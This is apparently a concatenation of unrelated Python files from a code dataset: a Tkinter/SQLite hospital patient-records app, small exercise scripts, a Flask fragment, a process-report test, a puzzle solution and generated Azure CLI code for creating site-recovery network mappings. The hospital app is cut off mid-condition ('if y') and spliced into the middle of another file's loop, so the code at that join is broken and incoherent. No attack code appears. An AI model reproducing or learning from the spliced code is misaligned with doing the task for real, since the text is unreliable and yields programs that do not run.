#bring the entries to the frame\r\n entry2.grid(row=0, columnspan=2, column=1)\r\n entry3.grid(row=0, columnspan=2, column=3)\r\n entry4.grid(row=0, columnspan=2, column=5)\r\n\r\n button3.grid(row=1, column=0)\r\n backButton.grid(row=0, column=4)\r\ndef viewPatientData():\r\n for widget in botFrame.winfo_children():\r\n widget.grid_remove()\r\n botFrame.pack(side=BOTTOM)\r\n\r\n entry5 = Entry(botFrame, width=25)\r\n entry5.grid(row=0,column=1, pady=10)\r\n label5 = Label(botFrame, text=\"Enter the Patient's ID\")\r\n label5.grid(row=0, column=0, pady=10)\r\n button7 = Button(botFrame, text=\"Access\", command=lambda:accessData(entry5.get()))\r\n button7.grid(row=0, column=2, pady=10)\r\n\r\ndef accessData(x):\r\n for widget in botFrame.winfo_children():\r\n widget.grid_remove()\r\n botFrame.pack(side=BOTTOM)\r\n\r\n label6 = Label(botFrame, text=\"Choose the data to view\")\r\n label6.grid(row=0, column=0)\r\n accButton1 = Button(botFrame, text=\"Appointments\", command=lambda:appt(x))\r\n accButton2 = Button(botFrame, text=\"Contact Info\", command=lambda:contact(x))\r\n accButton3 = Button(botFrame, text=\"Room Info\", command=lambda:room(x))\r\n accButton4 = Button(botFrame, text=\"Payment Data\", command=lambda:payment(x))\r\n accButton1.grid(row=0, 
column=1)\r\n    accButton2.grid(row=0, column=2)\r\n    accButton3.grid(row=0, column=3)\r\n    accButton4.grid(row=0, column=4)\r\n\r\ndef appt(a):\r\n    for widget in frame.winfo_children():\r\n        widget.grid_remove()\r\n    cursor.execute(\"SELECT appt_number FROM appointment WHERE patient_id = ?\", (a,))\r\n    appointID=cursor.fetchall()\r\n    cursor.execute(\"SELECT COUNT(appt_number) FROM appointment WHERE patient_id = ?\", (a,))\r\n    x=cursor.fetchone()\r\n    db.commit()\r\n    newArr = tupleToArray(appointID, x)\r\n\r\n    apptTree=ttk.Treeview(frame)\r\n    apptTree['columns'] = (\"Patient Name\", \"Employee Name\", \"Date\")\r\n    apptTree.column(\"#0\", width=1, minwidth=0)\r\n    apptTree.column(\"Patient Name\", anchor=W)\r\n    apptTree.column(\"Employee Name\", anchor=W)\r\n    apptTree.column(\"Date\", anchor=W)\r\n    apptTree.heading(\"#0\", text=\"Label\", anchor=W)\r\n    apptTree.heading(\"Patient Name\", text=\"Patient Name\", anchor=W)\r\n    apptTree.heading(\"Employee Name\", text=\"Employee Name\", anchor=W)\r\n    apptTree.heading(\"Date\", text=\"Date\", anchor=W)\r\n\r\n    backButton.grid(row=0, column=4, pady=10)\r\n    addAppt=Button(frame, text=\"Add Appointments\", command=lambda:addAppointment(a))\r\n    addAppt.grid(row=0,column=3)\r\n    iter=0\r\n    for i in newArr:\r\n        x=str(i)\r\n        #get patient name\r\n        cursor.execute(\"SELECT patient_id FROM appointment WHERE appt_number= ?\", (x,))\r\n        patient=str(cursor.fetchone())\r\n        db.commit()\r\n        patient=deleteExtra(patient)\r\n        cursor.execute(\"SELECT f_name FROM patient WHERE patient_id = ?\", (patient,))\r\n        f_name=str(cursor.fetchone())\r\n        db.commit()\r\n        f_name=deleteExtra(f_name)\r\n        cursor.execute(\"SELECT l_name FROM patient WHERE patient_id = ?\", (patient,))\r\n        l_name=str(cursor.fetchone())\r\n        db.commit()\r\n        l_name=deleteExtra(l_name)\r\n        p_name=f_name + \" \" + l_name\r\n        \r\n\r\n        #get employee name\r\n        cursor.execute(\"SELECT emp_id FROM appointment WHERE appt_number=?\", (x,))\r\n        emp=str(cursor.fetchone())\r\n        db.commit()\r\n        emp=deleteExtra(emp) \r\n        cursor.execute(\"SELECT f_name from employee WHERE emp_id = ?\", (emp,))\r\n        f_name=str(cursor.fetchone())\r\n        db.commit()\r\n        f_name=deleteExtra(f_name)\r\n        cursor.execute(\"SELECT l_name from employee WHERE emp_id = ?\", (emp,))\r\n        l_name=str(cursor.fetchone())\r\n        db.commit()\r\n        l_name=deleteExtra(l_name)\r\n        emp_name= f_name + \" \" + l_name\r\n        \r\n\r\n        cursor.execute(\"SELECT date FROM appointment WHERE appt_number = ?\", (x,))\r\n        date=str(cursor.fetchone())\r\n        db.commit()\r\n        date=deleteExtra(date)\r\n        newDate=strToDate(date)\r\n        \r\n\r\n        apptTree.insert(parent='', index='end', iid=iter, text='Parent',values=(p_name, emp_name, newDate))\r\n        iter+=1\r\n    apptTree.grid(row=1, column=0, columnspan=3)\r\n\r\ndef addAppointment(pat):\r\n    apptLabel1 = Label(frame, text=\"Enter the date (For example: 4/26/2022 would be 4262022)\")\r\n    apptLabel1.grid(row=0, column=0)\r\n    apptEntry1.grid(row=0, column=1)\r\n    apptButton1 = Button(frame, text=\"Enter\", command=lambda:enter3(pat))\r\n    apptButton1.grid(row=0, column=2)\r\n\r\ndef contact(a):\r\n    for widget in frame.winfo_children():\r\n        widget.grid_remove()\r\n    cursor.execute(\"SELECT f_name FROM patient WHERE patient_id = ?\", (a,))\r\n    f_name=str(cursor.fetchone())\r\n    db.commit()\r\n    f_name=deleteExtra(f_name)\r\n    cursor.execute(\"SELECT l_name FROM patient WHERE patient_id = ?\", (a,))\r\n    l_name=str(cursor.fetchone())\r\n    db.commit()\r\n    l_name=deleteExtra(l_name)\r\n    p_name=f_name + \" \" + l_name\r\n    \r\n    cursor.execute(\"SELECT email FROM patient WHERE 
patient_id = ?\", (a,)) \r\n email=str(cursor.fetchone())\r\n db.commit()\r\n email=deleteExtra(email)\r\n\r\n cursor.execute(\"SELECT phone FROM patient WHERE patient_id = ?\", (a,))\r\n phone=str(cursor.fetchone())\r\n db.commit()\r\n phone=deleteExtra(phone)\r\n\r\n cursor.execute(\"SELECT address FROM patient WHERE patient_id = ?\", (a,))\r\n address=str(cursor.fetchone())\r\n db.commit()\r\n address=deleteExtra(address)\r\n\r\n cursor.execute(\"SELECT dob FROM patient WHERE patient_id = ?\", (a,))\r\n dob=str(cursor.fetchone())\r\n db.commit()\r\n dob=deleteExtra(dob)\r\n dob=strToDate(dob)\r\n\r\n cursor.execute(\"SELECT age FROM patient WHERE patient_id = ?\", (a,))\r\n age=str(cursor.fetchone())\r\n db.commit()\r\n age=deleteExtra(age)\r\n\r\n contactTree=ttk.Treeview(frame)\r\n contactTree['columns'] = (\"p_name\", \"email\", \"phone\", \"address\", \"dob\", \"age\")\r\n contactTree.column(\"#0\", width=1, minwidth=0)\r\n contactTree.column(\"p_name\", anchor=W)\r\n contactTree.column(\"email\", anchor=W)\r\n contactTree.column(\"phone\", anchor=W)\r\n contactTree.column(\"address\", anchor=W)\r\n contactTree.column(\"dob\", anchor=W)\r\n contactTree.column(\"age\", anchor=W)\r\n contactTree.heading(\"#0\", text=\"Label\", anchor=W)\r\n contactTree.heading(\"p_name\", text= \"Patient Name\", anchor=W)\r\n contactTree.heading(\"email\", text= \"Email Address\", anchor=W)\r\n contactTree.heading(\"phone\", text= \"Phone Number\", anchor=W)\r\n contactTree.heading(\"address\", text= \"Address\", anchor=W)\r\n contactTree.heading(\"dob\", text= \"Date of Birth\", anchor=W)\r\n contactTree.heading(\"age\", text= \"Age\", anchor=W)\r\n\r\n backButton.grid(row=0, column=4, pady=10)\r\n addCon=Button(frame, text=\"Update Contact\", command=lambda:addContact(a, p_name))\r\n addCon.grid(row=0,column=3)\r\n \r\n contactTree.insert(parent='', index='end', iid=iter, text='Parent',values=(p_name, email, phone, address, dob, age))\r\n contactTree.grid(row=1, column=0, columnspan=3)\r\n\r\ndef addContact(a, p_name):\r\n for widget in frame.winfo_children():\r\n widget.grid_remove()\r\n backButton.grid(row=0, column=7)\r\n contactLabel1 = Label(frame, text=\"Patient Name\")\r\n contactLabel2 = Label(frame, text=\"Email Address\")\r\n contactLabel3 = Label(frame, text=\"Phone Number\")\r\n contactLabel4 = Label(frame, text=\"Address\")\r\n contactLabel5 = Label(frame, text=\"Date of Birth\")\r\n contactLabel6 = Label(frame, text=\"Age\")\r\n contactLabel1.grid(row=0, column=1)\r\n contactLabel2.grid(row=0, column=2)\r\n contactLabel3.grid(row=0, column=3)\r\n contactLabel4.grid(row=0, column=4)\r\n contactLabel5.grid(row=0, column=5)\r\n contactLabel6.grid(row=0, column=6)\r\n contactLabel7 = Label(frame, padx=10, text=\"(For example: 4/26/2022 would be 4262022)\", wraplength=100)\r\n contactLabel7.grid(row=1, column=0)\r\n contactLabel8 = Label(frame, text=p_name, relief=RAISED)\r\n contactLabel8.grid(row=1, column=1)\r\n\r\n contactEntry1.grid(row=1, column=2)\r\n contactEntry2.grid(row=1, column=3)\r\n contactEntry3.grid(row=1, column=4)\r\n contactEntry4.grid(row=1, column=5)\r\n contactEntry5.grid(row=1, column=6)\r\n contactButton1 = Button(frame, text=\"Enter\", command=lambda:enter4(a), padx=10)\r\n contactButton1.grid(row=1, column=7)\r\n\r\ndef room(a):\r\n for widget in frame.winfo_children():\r\n widget.grid_remove()\r\n cursor.execute(\"SELECT f_name FROM patient WHERE patient_id = ?\", (a,))\r\n f_name=str(cursor.fetchone())\r\n db.commit()\r\n f_name=deleteExtra(f_name)\r\n 
cursor.execute(\"SELECT l_name FROM patient WHERE patient_id = ?\", (a,))\r\n l_name=str(cursor.fetchone())\r\n db.commit()\r\n l_name=deleteExtra(l_name)\r\n p_name=f_name + \" \" + l_name\r\n\r\n cursor.execute(\"SELECT room_number FROM patient_room WHERE patient_id = ?\", (a,))\r\n roomNum=cursor.fetchall()\r\n cursor.execute(\"SELECT COUNT(room_number) FROM patient_room WHERE patient_id = ?\", (a,))\r\n x=cursor.fetchone()\r\n db.commit()\r\n newArr=tupleToArray(roomNum, x)\r\n \r\n roomTree=ttk.Treeview(frame)\r\n roomTree['columns'] = (\"Patient Name\", \"Room\", \"Floor Number\", \"desc\")\r\n roomTree.column(\"#0\", width=1, minwidth=0)\r\n roomTree.column(\"Patient Name\", anchor=W)\r\n roomTree.column(\"Room\", anchor=W)\r\n roomTree.column(\"Floor Number\", anchor=W)\r\n roomTree.column(\"desc\", anchor=W)\r\n roomTree.heading(\"#0\", text=\"Label\", anchor=W)\r\n roomTree.heading(\"Patient Name\", text=\"Patient Name\", anchor=W)\r\n roomTree.heading(\"Room\", text=\"Room Number\", anchor=W)\r\n roomTree.heading(\"Floor Number\", text=\"Floor Number\", anchor=W)\r\n roomTree.heading(\"desc\", text=\"Room Description\", anchor=W)\r\n\r\n backButton.grid(row=0, column=4, pady=10)\r\n addR=Button(frame, text=\"Add patient to room\", command=lambda:addRoom(a))\r\n addR.grid(row=0,column=3)\r\n \r\n iter=0\r\n for i in newArr:\r\n strRoomNum=deleteExtra(i)\r\n cursor.execute(\"SELECT floor_number FROM room WHERE room_number = ?\", (i,))\r\n floor=str(cursor.fetchone())\r\n db.commit()\r\n floor=deleteExtra(floor)\r\n\r\n cursor.execute(\"SELECT description FROM room WHERE room_number = ?\", (i,))\r\n desc=str(cursor.fetchone())\r\n db.commit()\r\n desc=deleteExtra(desc)\r\n roomTree.insert(parent='', index='end', iid=iter, text='Parent',values=(p_name, strRoomNum, floor, desc))\r\n roomTree.grid(row=1, column=0, columnspan=3)\r\n \r\ndef addRoom(a): \r\n roomLabel1 = Label(frame, text=\"Enter the room number\")\r\n roomLabel1.grid(row=2, column=0, columnspan=2)\r\n roomEntry1.grid(row=3, column=1)\r\n \r\n roomButton1 = Button(frame, text=\"Enter\", command=lambda:enter5(a), pady=5)\r\n roomButton1.grid(row=3, column=2)\r\n \r\ndef payment(a):\r\n for widget in frame.winfo_children():\r\n widget.grid_remove()\r\n cursor.execute(\"SELECT payment_id FROM patient_pay WHERE patient_id = ?\", (a,))\r\n pay=cursor.fetchall()\r\n db.commit()\r\n cursor.execute(\"SELECT count(payment_id) FROM patient_pay WHERE patient_id = ?\", (a,))\r\n x=cursor.fetchone()\r\n pay=tupleToArray(pay,x)\r\n \r\n payTree=ttk.Treeview(frame)\r\n payTree['columns'] = (\"payment\", \"method\", \"insurance\")\r\n payTree.column(\"#0\", width=1, minwidth=0)\r\n payTree.column(\"payment\", anchor=W)\r\n payTree.column(\"method\", anchor=W)\r\n payTree.column(\"insurance\", anchor=W)\r\n payTree.heading(\"#0\", text=\"Label\", anchor=W)\r\n payTree.heading(\"payment\", text=\"Payment ID\", anchor=W)\r\n payTree.heading(\"method\", text=\"Payment Type\", anchor=W)\r\n payTree.heading(\"insurance\", text=\"Insurance Number\", anchor=W)\r\n \r\n backButton.grid(row=0, column=4, pady=10)\r\n addPay=Button(frame, text=\"Add Payment Method\", command=lambda:addPayment(a))\r\n addPay.grid(row=0,column=3)\r\n\r\n for i in pay:\r\n x=str(i)\r\n cursor.execute(\"SELECT method FROM payment_data WHERE payment_id = ?\",(x,))\r\n method=str(cursor.fetchone())\r\n db.commit()\r\n method=deleteExtra(method)\r\n cursor.execute(\"SELECT insurance_number FROM payment_data WHERE payment_id = ?\",(x,))\r\n 
insurNum=str(cursor.fetchone())\r\n        db.commit()\r\n        insurNum=deleteExtra(insurNum)\r\n\r\n        payTree.insert(parent='', index='end', iid=iter, text='Parent',values=(i, method, insurNum))\r\n        payTree.grid(row=1, column=0, columnspan=3)\r\n\r\ndef addPayment(a):\r\n    payLabel1 = Label(frame, text=\"Enter your method and insurance number\")\r\n    payLabel1.grid(row=2, column=0, columnspan=2)\r\n    payEntry1.grid(row=3, column=0)\r\n    payEntry2.grid(row=3, column=1)\r\n\r\n    payButton1 = Button(frame, text=\"Enter\", command=lambda:enter6(a))\r\n    payButton1.grid(row=3, column=2)\r\n\r\ndef enter():\r\n    global val\r\n    val=entry1.get()\r\n    getPatientInfo(val)\r\n    entry1.delete(0, END)\r\n\r\ndef enter2():\r\n    f_name=str(entry2.get())\r\n    l_name=str(entry3.get())\r\n    ailment=str(entry4.get())\r\n    entry2.delete(0,END)\r\n    entry3.delete(0,END)\r\n    entry4.delete(0,END)\r\n\r\n    label4 = Label(botFrame, text=\"Successful input\")\r\n    cursor.execute(\"SELECT COUNT(treat_id) FROM treat_plan WHERE emp_id = ?\", val)\r\n    x=cursor.fetchone()\r\n    db.commit()\r\n    y=0\r\n    for n in x: #changing the count from tuple to int to use when creating the new array\r\n        if not(n=='(' or n==',' or n==')'):\r\n            y=n\r\n    #inserting values into the patient table \r\n    cursor.execute(\"\"\" \r\n        INSERT INTO patient(f_name, l_name)\r\n        VALUES(?,?)\r\n        \"\"\", (f_name, l_name))\r\n    #cursor.execute(\"\"\" #attempt to make a trigger\r\n    #    CREATE TRIGGER update_treat_plan\r\n    #       AFTER UPDATE ON patient\r\n    #       WHEN old.f_name <> new.f_name\r\n    #       OR old.l_name <> new.l_name\r\n    #BEGIN\r\n    #    INSERT INTO treat_plan(\r\n    #        \"emp_id\",\r\n    #        \"patient_id\",\r\n    #        \"ailment\"\r\n    #    )\r\n    #    VALUES (\r\n    #        ?, (SELECT max(patient_id) from patient), ?\r\n    #)\r\n    #\"\"\", (val, ailment))\r\n    cursor.execute(\"SELECT max(patient_id) FROM patient\")\r\n    p_id = str(cursor.fetchone())\r\n    db.commit()\r\n    p_id=deleteExtra(p_id)\r\n    cursor.execute(\"\"\"\r\n        INSERT INTO treat_plan(emp_id, patient_id, ailment)\r\n        VALUES(?,?,?)\r\n        \"\"\", (val, p_id, ailment))\r\n    db.commit()\r\n    cursor.execute(\"SELECT COUNT(treat_id) FROM treat_plan WHERE emp_id = ?\", val)\r\n    x=cursor.fetchone()\r\n    db.commit()\r\n    newY=0\r\n    for n in x: #changing the count from tuple to int to use when creating the new array\r\n        if not(n=='(' or n==',' or n==')'):\r\n            newY=n\r\n    if y
 1:\n                break\n        else:\n            continue\n        break\n    else:\n        print(\"Found non-overlap at: \" + str(i))\n        break\n","repo_name":"bannsec/advent_of_code","sub_path":"2018/3/part_2/win.py","file_name":"win.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"39551367019","text":"def run():\n    # nombre = input(\"Enter your name: \")\n    # for letra in nombre:\n    #     print(letra)\n    \n    frase = input(\"Enter a phrase: \")\n    for caracter in frase:\n        print(caracter.upper()) #Prints each character, but in uppercase\n\n\nif __name__ == \"__main__\":\n    run()","repo_name":"haroldadrada/Python_basico","sub_path":"11_recorrer.py","file_name":"11_recorrer.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72282724311","text":"# enter a number and return True/False\n# prime number\nwhile True:\n    userInput = int(input(\"Please enter a number: \"))\n    counter = 0\n    for i in range(1,userInput+1):\n        if userInput % i == 0:\n            counter += 1\n    \n    if counter == 2:\n        print(\"it is a prime number\") \n    else:\n        print(\"it is not a prime 
status=500)\n\n\n","repo_name":"Bellinazzi31/twiter2","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14292253658","text":"from pyProcessReport import *\n\n# A project name as well as wafer name are required to build a report\nreport=ProcessReport('SFQ','WaferT053017A')\n\n# Building the appropriate layers to which processes will be later added\nM1 = Layer('M1', layer_comment='Bottom electrode of JJ stack and DC/SFQ shunt inductor.' )\nV2 = Layer('V2', layer_comment='JJ pocket definition in dielectric.')\nM2 = Layer('M2', layer_comment='JJ oxidation and wiring layer.')\n\n# Build processes which will be added to layers\nV2dep = PT70PECVD('01aug2017', process_comment='Ezpz')\n\nV2dep.add_parameter('Recipe Name (ch1)', 'SiOxide2')\nV2dep.add_parameters({'Platen Temperature (C)': '250',\n 'Deposition Material': 'SiOx',\n 'Thickness Target (nm)': '180',\n 'DC Response (V)': '-18'})\n\nV2dep.add_step({'step number': 1, 'step': 'Pre-clean Time (x2, s)', 'value': '150'})\n\nV2dep.add_steps([{'step number': 2, 'step': 'Pre-seed Time (s)', 'value': '500'},\n {'step number': 3, 'step': 'Deposition Time (s)', 'value': '350'}])\n\n\nV2etch = Unaxis790RIE('01aug2017', process_comment='Etch the Ezpz')\n\nV2etch.add_parameter('Recipe Name', '50CHF3')\nV2etch.add_parameters({'Platen': 'Carbon',\n 'Etched Material': 'PECVD SiOx',\n 'DC Response (V)': '272'\n })\n\nV2etch.add_step({'step number': 1, 'step': 'Pre-clean Time (s)', 'value': '300'})\n\nV2etch.add_steps([{'step number': 2, 'step': 'Pre-seed Time (s)', 'value': '0'},\n {'step number': 3, 'step': 'Etch Time (s)', 'value': '480'}])\n\n# Add processes to the appropriate layers\nV2.add_process(V2dep)\nV2.add_process(V2etch)\nV2.add_image('kitten.jpg', 'This is a kitten. It does not care about you.')\n\nV2.add_image('cat.jpg', 'This is a cat. 
It still does not care about you.')\n\n# Add layers to the report\nreport.add_layer(M1)\nreport.add_layer(V2)\nreport.add_layer(M2)\n\n# Build the report once all pieces are added to it\nreport.build_pdf(filename='testing1', save_tex=True)\n\n","repo_name":"McDermott-Group/pyProcessReport","sub_path":"testing/testReport.py","file_name":"testReport.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10981167533","text":"import itertools\ndef solution(h, q):\n # solution(h: int, q: List[int]) -> List[int]\n\n def pair_siblings(p=-1, d=0, c=0):\n if p == -1:\n siblings.insert(c,[nodes[0]])\n pair_siblings(p=0, d=1, c=1)\n elif d < h:\n lc = p + 2**(h-d)\n rc = p + 1\n siblings.insert(c,[ nodes[lc], nodes[rc] ])\n pair_siblings(lc, d + 1, (2*c))\n pair_siblings(rc, d + 1, (2*c) + 1)\n\n def find_parents(q, siblings,parents=[]):\n btree = list(itertools.chain.from_iterable(siblings))\n for i in q:\n if i in btree:\n j = btree.index(i)\n if j == 0:\n parents.append(-1)\n else:\n p = int((j-1)/2)\n parents.append(btree[p])\n return parents\n\n max = (2**h+1) - 1\n nodes = list(reversed([ i for i in range(1, max)]))\n\n if not nodes:\n return [-1]\n\n # Create a list of siblings\n siblings=[]\n pair_siblings()\n\n return find_parents(q, siblings)\n\ntest = [1,2,3]\nprint(solution(5, [19, 14, 28]))\n#print(solution(4, test))\nprint(solution(3, [7, 3, 5, 1]))\n#print(solution(2, test))\nprint(solution(1, test))\nprint(solution(0, test))\n# def ptree(h,t,o,s=0):\n# for d in range(h):\n# n = 2**d\n# o.append([t[i] for i in range(s, n+s)])\n# s += n\n# return o\n #print(nodes)\n #print(ptree(h,t,o=[]))\n","repo_name":"xnorkl/google_code_challenge","sub_path":"level_2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"40124251028","text":"from azure.cli.core.aaz import *\n\n\n@register_command(\n \"site-recovery network mapping create\",\n)\nclass Create(AAZCommand):\n \"\"\"Create operation to create an ASR network mapping.\n\n :example: network mapping create for A2A fabric\n az site-recovery network mapping create -g rg --fabric-name fabric1_name -n network_mapping1_name --network-name azureNetwork --vault-name vault_name --recovery-network-id vnet2_id --fabric-details '{azure-to-azure:{primary-network-id:vnetvm_id}}' --recovery-fabric-name fabric2_name\n\n :example: network mapping create for H2A E2A (VMM)\n az site-recovery network mapping create -g \"rg\" --fabric-name \"fabric_name\" -n \"network_mapping_name\" --network-name \"vnet_source_name\" --vault-name \"vault_name\" --recovery-network-id \"vnet_recovery_id\" --fabric-details '{vmm-to-azure:\"\"}'\n \"\"\"\n\n _aaz_info = {\n \"version\": \"2022-08-01\",\n \"resources\": [\n [\"mgmt-plane\", \"/subscriptions/{}/resourcegroups/{}/providers/microsoft.recoveryservices/vaults/{}/replicationfabrics/{}/replicationnetworks/{}/replicationnetworkmappings/{}\", \"2022-08-01\"],\n ]\n }\n\n AZ_SUPPORT_NO_WAIT = True\n\n def _handler(self, command_args):\n super()._handler(command_args)\n return self.build_lro_poller(self._execute_operations, self._output)\n\n _args_schema = None\n\n @classmethod\n def _build_arguments_schema(cls, *args, **kwargs):\n if cls._args_schema is not None:\n return cls._args_schema\n cls._args_schema = super()._build_arguments_schema(*args, **kwargs)\n\n # define Arg Group \"\"\n\n 
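# The options declared below supply the positional context the request URL needs: fabric, mapping name, network, resource group and vault.\n        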
_args_schema = cls._args_schema\n _args_schema.fabric_name = AAZStrArg(\n options=[\"--fabric-name\"],\n help=\"Primary fabric name.\",\n required=True,\n )\n _args_schema.network_mapping_name = AAZStrArg(\n options=[\"-n\", \"--name\", \"--network-mapping-name\"],\n help=\"Network mapping name.\",\n required=True,\n )\n _args_schema.network_name = AAZStrArg(\n options=[\"--network-name\"],\n help=\"Primary network name.\",\n required=True,\n )\n _args_schema.resource_group = AAZResourceGroupNameArg(\n required=True,\n )\n _args_schema.vault_name = AAZStrArg(\n options=[\"--vault-name\"],\n help=\"The name of the recovery services vault.\",\n required=True,\n )\n\n # define Arg Group \"Properties\"\n\n _args_schema = cls._args_schema\n _args_schema.fabric_specific_details = AAZObjectArg(\n options=[\"--fabric-details\", \"--fabric-specific-details\"],\n arg_group=\"Properties\",\n help=\"Fabric specific input properties.\",\n )\n _args_schema.recovery_fabric_name = AAZStrArg(\n options=[\"--recovery-fabric-name\"],\n arg_group=\"Properties\",\n help=\"Recovery fabric Name.\",\n )\n _args_schema.recovery_network_id = AAZStrArg(\n options=[\"--recovery-network-id\"],\n arg_group=\"Properties\",\n help=\"Recovery network Id.\",\n required=True,\n )\n\n fabric_specific_details = cls._args_schema.fabric_specific_details\n fabric_specific_details.azure_to_azure = AAZObjectArg(\n options=[\"azure-to-azure\"],\n )\n fabric_specific_details.vmm_to_azure = AAZObjectArg(\n options=[\"vmm-to-azure\"],\n )\n\n azure_to_azure = cls._args_schema.fabric_specific_details.azure_to_azure\n azure_to_azure.primary_network_id = AAZStrArg(\n options=[\"primary-network-id\"],\n help=\"The primary azure vnet Id.\",\n required=True,\n )\n\n vmm_to_azure = cls._args_schema.fabric_specific_details.vmm_to_azure\n vmm_to_azure.location = AAZStrArg(\n options=[\"location\"],\n help=\"The Location.\",\n )\n return cls._args_schema\n\n def _execute_operations(self):\n self.pre_operations()\n yield self.ReplicationNetworkMappingsCreate(ctx=self.ctx)()\n self.post_operations()\n\n @register_callback\n def pre_operations(self):\n pass\n\n @register_callback\n def post_operations(self):\n pass\n\n def _output(self, *args, **kwargs):\n result = self.deserialize_output(self.ctx.vars.instance, client_flatten=True)\n return result\n\n class ReplicationNetworkMappingsCreate(AAZHttpOperation):\n CLIENT_TYPE = \"MgmtClient\"\n\n def __call__(self, *args, **kwargs):\n request = self.make_request()\n session = self.client.send_request(request=request, stream=False, **kwargs)\n if session.http_response.status_code in [202]:\n return self.client.build_lro_polling(\n self.ctx.args.no_wait,\n session,\n self.on_200,\n self.on_error,\n lro_options={\"final-state-via\": \"azure-async-operation\"},\n path_format_arguments=self.url_parameters,\n )\n if session.http_response.status_code in [200]:\n return self.client.build_lro_polling(\n self.ctx.args.no_wait,\n session,\n self.on_200,\n self.on_error,\n lro_options={\"final-state-via\": \"azure-async-operation\"},\n path_format_arguments=self.url_parameters,\n )\n\n return self.on_error(session.http_response)\n\n @property\n def url(self):\n return self.client.format_url(\n \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{resourceName}/replicationFabrics/{fabricName}/replicationNetworks/{networkName}/replicationNetworkMappings/{networkMappingName}\",\n **self.url_parameters\n )\n\n @property\n def method(self):\n return 
\"PUT\"\n\n @property\n def error_format(self):\n return \"ODataV4Format\"\n\n @property\n def url_parameters(self):\n parameters = {\n **self.serialize_url_param(\n \"fabricName\", self.ctx.args.fabric_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"networkMappingName\", self.ctx.args.network_mapping_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"networkName\", self.ctx.args.network_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"resourceGroupName\", self.ctx.args.resource_group,\n required=True,\n ),\n **self.serialize_url_param(\n \"resourceName\", self.ctx.args.vault_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"subscriptionId\", self.ctx.subscription_id,\n required=True,\n ),\n }\n return parameters\n\n @property\n def query_parameters(self):\n parameters = {\n **self.serialize_query_param(\n \"api-version\", \"2022-08-01\",\n required=True,\n ),\n }\n return parameters\n\n @property\n def header_parameters(self):\n parameters = {\n **self.serialize_header_param(\n \"Content-Type\", \"application/json\",\n ),\n **self.serialize_header_param(\n \"Accept\", \"application/json\",\n ),\n }\n return parameters\n\n @property\n def content(self):\n _content_value, _builder = self.new_content_builder(\n self.ctx.args,\n typ=AAZObjectType,\n typ_kwargs={\"flags\": {\"required\": True, \"client_flatten\": True}}\n )\n _builder.set_prop(\"properties\", AAZObjectType, \".\", typ_kwargs={\"flags\": {\"required\": True}})\n\n properties = _builder.get(\".properties\")\n if properties is not None:\n properties.set_prop(\"fabricSpecificDetails\", AAZObjectType, \".fabric_specific_details\")\n properties.set_prop(\"recoveryFabricName\", AAZStrType, \".recovery_fabric_name\")\n properties.set_prop(\"recoveryNetworkId\", AAZStrType, \".recovery_network_id\", typ_kwargs={\"flags\": {\"required\": True}})\n\n fabric_specific_details = _builder.get(\".properties.fabricSpecificDetails\")\n if fabric_specific_details is not None:\n fabric_specific_details.set_const(\"instanceType\", \"AzureToAzure\", AAZStrType, \".azure_to_azure\", typ_kwargs={\"flags\": {\"required\": True}})\n fabric_specific_details.set_const(\"instanceType\", \"VmmToAzure\", AAZStrType, \".vmm_to_azure\", typ_kwargs={\"flags\": {\"required\": True}})\n fabric_specific_details.discriminate_by(\"instanceType\", \"AzureToAzure\")\n fabric_specific_details.discriminate_by(\"instanceType\", \"VmmToAzure\")\n\n disc_azure_to_azure = _builder.get(\".properties.fabricSpecificDetails{instanceType:AzureToAzure}\")\n if disc_azure_to_azure is not None:\n disc_azure_to_azure.set_prop(\"primaryNetworkId\", AAZStrType, \".azure_to_azure.primary_network_id\", typ_kwargs={\"flags\": {\"required\": True}})\n\n disc_vmm_to_azure = _builder.get(\".properties.fabricSpecificDetails{instanceType:VmmToAzure}\")\n if disc_vmm_to_azure is not None:\n disc_vmm_to_azure.set_prop(\"location\", AAZStrType, \".vmm_to_azure.location\")\n\n return self.serialize_content(_content_value)\n\n def on_200(self, session):\n data = self.deserialize_http_content(session)\n self.ctx.set_var(\n \"instance\",\n data,\n schema_builder=self._build_schema_on_200\n )\n\n _schema_on_200 = None\n\n @classmethod\n def _build_schema_on_200(cls):\n if cls._schema_on_200 is not None:\n return cls._schema_on_200\n\n cls._schema_on_200 = AAZObjectType()\n\n _schema_on_200 = cls._schema_on_200\n _schema_on_200.id = AAZStrType(\n flags={\"read_only\": True},\n )\n _schema_on_200.location = AAZStrType()\n _schema_on_200.name = 
AAZStrType(\n flags={\"read_only\": True},\n )\n _schema_on_200.properties = AAZObjectType()\n _schema_on_200.type = AAZStrType(\n flags={\"read_only\": True},\n )\n\n properties = cls._schema_on_200.properties\n properties.fabric_specific_settings = AAZObjectType(\n serialized_name=\"fabricSpecificSettings\",\n )\n properties.primary_fabric_friendly_name = AAZStrType(\n serialized_name=\"primaryFabricFriendlyName\",\n )\n properties.primary_network_friendly_name = AAZStrType(\n serialized_name=\"primaryNetworkFriendlyName\",\n )\n properties.primary_network_id = AAZStrType(\n serialized_name=\"primaryNetworkId\",\n )\n properties.recovery_fabric_arm_id = AAZStrType(\n serialized_name=\"recoveryFabricArmId\",\n )\n properties.recovery_fabric_friendly_name = AAZStrType(\n serialized_name=\"recoveryFabricFriendlyName\",\n )\n properties.recovery_network_friendly_name = AAZStrType(\n serialized_name=\"recoveryNetworkFriendlyName\",\n )\n properties.recovery_network_id = AAZStrType(\n serialized_name=\"recoveryNetworkId\",\n )\n properties.state = AAZStrType()\n\n fabric_specific_settings = 